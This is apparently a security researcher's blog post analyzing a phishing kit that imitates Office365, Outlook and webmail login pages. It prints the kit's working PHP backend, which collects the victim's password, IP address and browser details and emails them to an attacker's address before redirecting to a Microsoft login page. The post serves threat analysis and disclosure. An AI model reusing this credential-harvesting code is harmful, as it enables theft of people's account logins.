Phishing findings, campaign #1: u.zip (Office365/Outlook)

I started hunting and reporting phishing websites on Twitter: follow me here if you are interested! In this series of posts I am going to analyze and discuss some of the phishing kits found online.

Let’s start from the beginning

Here is my tweet containing some information about this instance of the kit:

We can clearly see from the second screenshot that the zip containing the phishing kit is left exposed, thus we can download it and check it on VirusTotal using the hash of the zip:

$ sha256sum u.zip
c9079c6f6576da99f979b637c358a45f89c7187ddb80edf9e7fb2d9500880173  u.zip
u.zip on VirusTotal

u.zip on VirusTotal

Explore the kit

When extracting the archive, we can see the following structure:

u
β”œβ”€β”€ aol.php
β”œβ”€β”€ css
β”‚Β Β  β”œβ”€β”€ bootstrap.min.css
β”‚Β Β  └── style.css
β”œβ”€β”€ emailcode
β”‚Β Β  └── email.php
β”œβ”€β”€ images
β”‚Β Β  β”œβ”€β”€ landing-devices-bg.jpg
β”‚Β Β  β”œβ”€β”€ mail.png
β”‚Β Β  β”œβ”€β”€ microbg.jpg
β”‚Β Β  β”œβ”€β”€ microsoftlogo.png
β”‚Β Β  β”œβ”€β”€ mobile-img.png
β”‚Β Β  β”œβ”€β”€ officebg.jpg
β”‚Β Β  β”œβ”€β”€ officelogo.png
β”‚Β Β  β”œβ”€β”€ office.png
β”‚Β Β  β”œβ”€β”€ Onedrive-logo.png
β”‚Β Β  β”œβ”€β”€ outlook.png
β”‚Β Β  └── webmaillogo.png
β”œβ”€β”€ index.php
β”œβ”€β”€ js
β”‚Β Β  └── bootstrap.min.js
β”œβ”€β”€ microsoft.php
β”œβ”€β”€ office.php
β”œβ”€β”€ outlookcode
β”‚Β Β  └── email.php
└── webmail.php

I usually start the analysis from the entrypoint: so, in this case, index.php. If we look at the div having the class loginform, we can find an interesting feature of this kit: it gives the user three options to login (Office365, Outlook and ‘other mail’).

Here is how it looks in the code and in the browser:

<div class="loginform">
<a href="office.php"  class="loginoffice">Login with Office 365</a>
<a href="microsoft.php" class="loginoutlook">Login with Outlook</a>
<a href="webmail.php" class="loginmail">Login with Other Mail</a>
</div>
How this phishing kit looks like when deployed

How this phishing kit looks like when deployed

Exfiltration method

The three PHP files referenced from index.php all include emailcode/email.php in the action of the form containing input fields for the credentials. Here is the form in one of them, specifically webmail.php:

<form name="webmail" methed="post" action="emailcode/email.php">
   <div class="form-group orangeclr">
       <label for="email">Email Address</label>
       <div class="input-group mb-2 mr-sm-2 mb-sm-0">
           <div class="input-group-addon" style="width: 2.6rem"><i class="fa fa-at"></i></div>
           <input type="text" name="email" class="form-control" id="email"
                    placeholder="you@example.com" required autofocus>
       </div>
   </div>
   <div class="form-group orangeclr">
       <label class="" for="password">Password</label>
       <div class="input-group mb-2 mr-sm-2 mb-sm-0">
           <div class="input-group-addon" style="width: 2.6rem"><i class="fa fa-key"></i></div>
           <input type="password" name="password" class="form-control" id="password"
                  placeholder="Password" required>
       </div>
   </div>
   <div class="gostepbtn">
       <input type="submit" name="submit_btn" value="Go to step 2" class="gostep" />
   </div>
</form>

After the victim enters the credentials, these are sent to emailcode/email.php with a POST. Let’s check what happens in there:

<?php
if(isset($_REQUEST['submit_btn'])){
    $admin_email = "macdon161@gmail.com";
    $email = $_REQUEST['email'];
    $password = $_REQUEST['password'];
    $ip = getenv("REMOTE_ADDR");
    $country = ip_visitor_country();
    $region = ip_visitor_region();
    $city = ip_visitor_city();
    $adddate = date("D M d, Y g:i a");
    $browser = $_SERVER['HTTP_USER_AGENT'];

admin_email contains the exfiltration email address for this instance of the phishing kit. So we can confirm that information is sent directly via email to the address specified in the variable.

As it is possible to see in the code above, the email sent includes multiple information: credentials, IP address, date and User-Agent string. The kit also tries to obtain the country, region and city where the request was generated by performing a request to geoplugin.net with curl_init and providing the IP address. However - as of now - the service has moved to geoplugin.com, thus these information cannot currently be collected by the kit.

<?php
// Always set content-type when sending HTML email
$formname = $_REQUEST['logintype'];
switch ($formname) {
    case "office":
        $message .= "Login Type Selection -- Office \n";
        $subject = "Office login attempt -- ".$ip;
        break;
    case "outlook":
        $message .= "Login Type Selection -- Outlook \n";
        $subject = "Outlook login attempt -- ".$ip;
        break;
    case "webmail":
        $message .= "Login Type Selection -- Webmail \n";
        $subject = "Webmail login attempt -- ".$ip;
        break;
    default:
        $message .= "Login Type Selection -- other \n";
        $subject = "other login attempt -- ".$ip;
}

Using a switch, the kit detects which type of credentials were submitted by the phished user, and it changes the message and the subject of the email accordingly.

In the rest of the code the headers and body of the email are set, then the email is sent using mail(). After that, the user is redirected to a login page of Microsoft: https://login.microsoftonline.com/common/oauth2.

<?php
$from = 'Outlook <noreply>';
// To send HTML mail, the Content-type header must be set
$headers  = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
// Create email headers
$headers .= 'From: '.$from."\r\n".
    'Reply-To: '.$from."\r\n" .
    'X-Mailer: PHP/' . phpversion();
$headers .= "MIME-Version: 1.0" . "\r\n";
$headers .= "Content-Type: text/html; charset=ISO-8859-1\r\n";
// More headers
$headers .= "Reply-To: ". strip_tags($email) . "\r\n";
$message .= "Username/Email -- $email\n";
$message .= "Password -- $password\n";
$message .= "IP --  ".$ip."\n";
$message .= "Country Detected --  ".$country."\n";
$message .= "Region Detected --  ".$region."\n";
$message .= "City Detected --  ".$city."\n";
$message .= "Date --  ".$adddate."\n";
$message .= "Browser Detected --  ".$browser."\n";
  //send email
@mail($admin_email,$subject,$message);
header('Location: https://login.microsoftonline.com/common/oauth2');

Other php files

At this point, the workflow of the kit seems clear, however there are two php files that seem unrelated with the rest of the kit, because they are never called or included: outlookcode/email.php and aol.php.

outlookcode/email.php

This file seems to have the same purpose of emailcode/email.php, but is less sophisticated, as it does not contain the switch case to handle multiple phishing pages. Here is the code:

<?php
if(isset($_REQUEST['submit_btn'])){
    $admin_email = "macdon161@gmail.com";
    $email = $_REQUEST['email'];
    $password = $_REQUEST['password'];
      // $headers = "From:".$email;

      // Always set content-type when sending HTML email
    $headers = "MIME-Version: 1.0" . "\r\n";
    $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";

    // More headers
    $headers .= 'From:'.$email . "\r\n";


    $subject = 'Recived data'.$email;

    $headers = "From: " . strip_tags($email) . "\r\n";
    $headers .= "Reply-To: ". strip_tags($email) . "\r\n";
    $headers .= "MIME-Version: 1.0\r\n";
    $headers .= "Content-Type: text/html; charset=ISO-8859-1\r\n";

    $message = '<html><body>';
    $message .= '<p>Username: '.$email.'<p><br>';
    $message .= '<p>Password: '.$password.'<p><br>';
    $message .= '</body></html>';
      //send email
    if(mail($admin_email, $subject, $message, $headers )){
      header('Location: https://login.microsoftonline.com/common/oauth2');
    }

}
      //if "email" variable is not filled out, display the form

Considering that the exfiltration email is included also here, I assume that this is just the code of an old version of the kit that was left in the zip by mistake… But who knows? 🀷

aol.php

If we manually navigate to aol.php with our browser, we see the following:

aol.php

aol.php

It seems another phishing page, this time for an app which has email capabilities.

Interacting with the page, we can notice that ‘Forgot Password?’, ‘Get a Free Username’ and ‘Erase Hard Drive Junk Now’ are not working, and the same applies to the ‘GET THE AOL APP’ button. In the source code, they all have the href attribute equal to javascript:void(0).

AOL apps

AOL apps

Here is the form:

<?php
require_once('emailcode/email.php')
?>
// SKIPPING NOT INTERESTING HTML
<form class="needs-validation" method="post" action="" novalidate>
    <div class="form-group">
	<input type="Email" class="form-control" id="validationCustom01" placeholder="Email" required>
	<div class="invalid-feedback">
	    Enter Email Address
	</div>
    </div>
    <div class="form-group">
	<input type="password" class="form-control" id="validationCustom02" placeholder="Password" required>
	<div class="invalid-feedback">
	    Enter Password
	</div>
    </div>
    <a href="javascript:void(0);" class="forgotBtn">Forgot Password?</a>
    <button class="btn stepBtn" type="submit">Go to step 2</button>
    <div class="get-user">
	<span><a href="javascript:void(0);">Get a Free Username</a></span>
	<a href="javascript:void(0);">Erase Hard Drive Junk Now</a>
    </div>
</form>

As for the other phishing pages of the kit, emailcode/email.php is imported also here. However, in this case, the action attribute of the form is empty; thus the php code will not be able to process the credentials of the victims.

The file is clear according to VirusTotal:

aol.php on VirusTotal

aol.php on VirusTotal

What about the other files?

We can check the VirusTotal detections of all the files using the sha256 hash:

$ find . -type f | xargs sha256sum
e7ed36ceee5450b4243bbc35188afabdfb4280c7c57597001de0ed167299b01b  ./js/bootstrap.min.js
2777abe0312e6b49428d5d7f7f42e43af620793f86f823f2e045968afbdddb63  ./images/microbg.jpg
2ebc65a696544b8d69ade5f136250a9548d4badf1b9ad459e63ff68e7a985c69  ./images/mail.png
17f02fdb590800c9a21e2b6166f5f22cc54952d58897f09d8e82bb9195bc2071  ./images/outlook.png
089aa7fa65a4038b4ab9130d083e6bcc24b0e33f5018984ef1463b8516bc7993  ./images/microsoftlogo.png
e298d32d99708f56d68ef9cd0c44ec85910a4df7552b5b2041fcaa48d5ee9742  ./images/webmaillogo.png
efaccc2b190fcce0f0ab41064d882fb4a701c6aed6b1035595a16138e32a0a50  ./images/officelogo.png
6adc34b6d4d872e313e0857063eac568a489ab092ff0f15834a2559043c9c1e2  ./images/mobile-img.png
c86c4a6731077f1994a8caeccb1fc06477ea35a5b6abbb4abde1d06b8ef9ff32  ./images/landing-devices-bg.jpg
4603ea1b2f9df0c9d4f2a253c550ffbaf27ea2cb53ecde4277b2acf9dde33979  ./images/Onedrive-logo.png
1500514adf9e666a3d20530815df881bc94812c6906a53bd4c216d051d18c372  ./images/office.png
7a2c0b0e1e16041b12dd1a7d18438ceb14063c980799baee1d55cb2f04892777  ./images/officebg.jpg
84f1d1ffdc036768ffeba1be92362dcf619e7ce6ec27500ab47844ed24fc4230  ./index.php
0b09beb179bd176c93c443175940777332cf57ac9e4487ea9088ae21e3c6d032  ./microsoft.php
8979f584623e4307a42bd008d755c35456af8cb96bec89dd4fbec47036e20184  ./css/style.css
2c0f3dcfe93d7e380c290fe4ab838ed8cadff1596d62697f5444be460d1f876d  ./css/bootstrap.min.css
c60bd69cdc08032d32898d4d3f7648a5370f15720b58b51af77a4ecd72799bc3  ./webmail.php
e5a35da055cf9b0cf6d4cfbd2d0e8be75ebdc56949740c5e767f12915e6174eb  ./office.php
085f5dfb1f89bd983c58e618a95bf7bdaa872bee4a126495ec3e7cf421bb9fc2  ./aol.php
3234d6c03d185864d6537178a4d1e44c5277c9115f11b07f9c5be0517ebc51a7  ./emailcode/email.php
d6083dcb3385f93916f63b6e50d28791a51842d38bd507bcad7b731b7b33009d  ./outlookcode/email.php

Here are the detections of index.php, microsoft.php, office.php and webmail.php on VirusTotal as of today.

index.php, microsoft.php, office.php and webmail.php on VirusTotal

index.php, microsoft.php, office.php and webmail.php on VirusTotal

No matches were found for emailcode/email.php and outlookcode/email.php. All the other files were flagged as ‘Undetected’ by all the engines on VirusTotal.

Conclusion

In this post, we analyzed u.zip, a phishing kit found online which tricks victims into giving their credentials using 3 templates: one for Office365, one for Outlook and one for other email services (with a cPanel theme).

Schema of the phishing kit

Schema of the phishing kit

The templates redirect the credentials to emailcode/email.php, which tries to gather additional information and writes them into an email, that is sent to the exfiltration email address. At the end of the execution, the victim is redirected to login.microsoftonline.com.